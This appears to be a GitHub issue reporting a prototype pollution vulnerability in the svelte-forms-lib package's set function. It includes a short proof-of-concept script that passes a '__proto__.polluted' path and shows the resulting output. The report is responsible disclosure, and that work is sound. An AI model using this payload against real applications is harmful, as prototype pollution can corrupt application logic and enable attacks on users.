svelte-forms-lib icon indicating copy to clipboard operation
svelte-forms-lib copied to clipboard

Published 20 hours ago verified publisher icon tjinauyeung

Prototype Pollution

Open ready-research opened this issue 3 years ago • 0 comments

Summary

svelte-forms-lib package is vulnerable to Prototype Pollution. The set function fails to validate which Object properties it updates. This allows attackers to modify the prototype of Object, causing the addition or modification of an existing property on all objects. Reported in huntr https://www.huntr.dev/bounties/69aa6433-5e43-4a2c-a4e1-3671c255b11e/ (8 months ago) Please validate this using Mark as valid. Thanks.

Steps to reproduce

// poc.mjs
import {util} from 'svelte-forms-lib/lib/util.js';
const obj = {};
console.log("Before : " + {}.polluted);
util.set(obj, "__proto__.polluted", 'Yes! Its Polluted');
console.log("After : " + {}.polluted);

Result:

Before : undefined
After : Yes! Its Polluted

Example Project

What is the current bug behavior?

What is the expected correct behavior?

Relevant logs and/or screenshots

Possible fixes

ready-research avatar May 10 '22 10:05 ready-research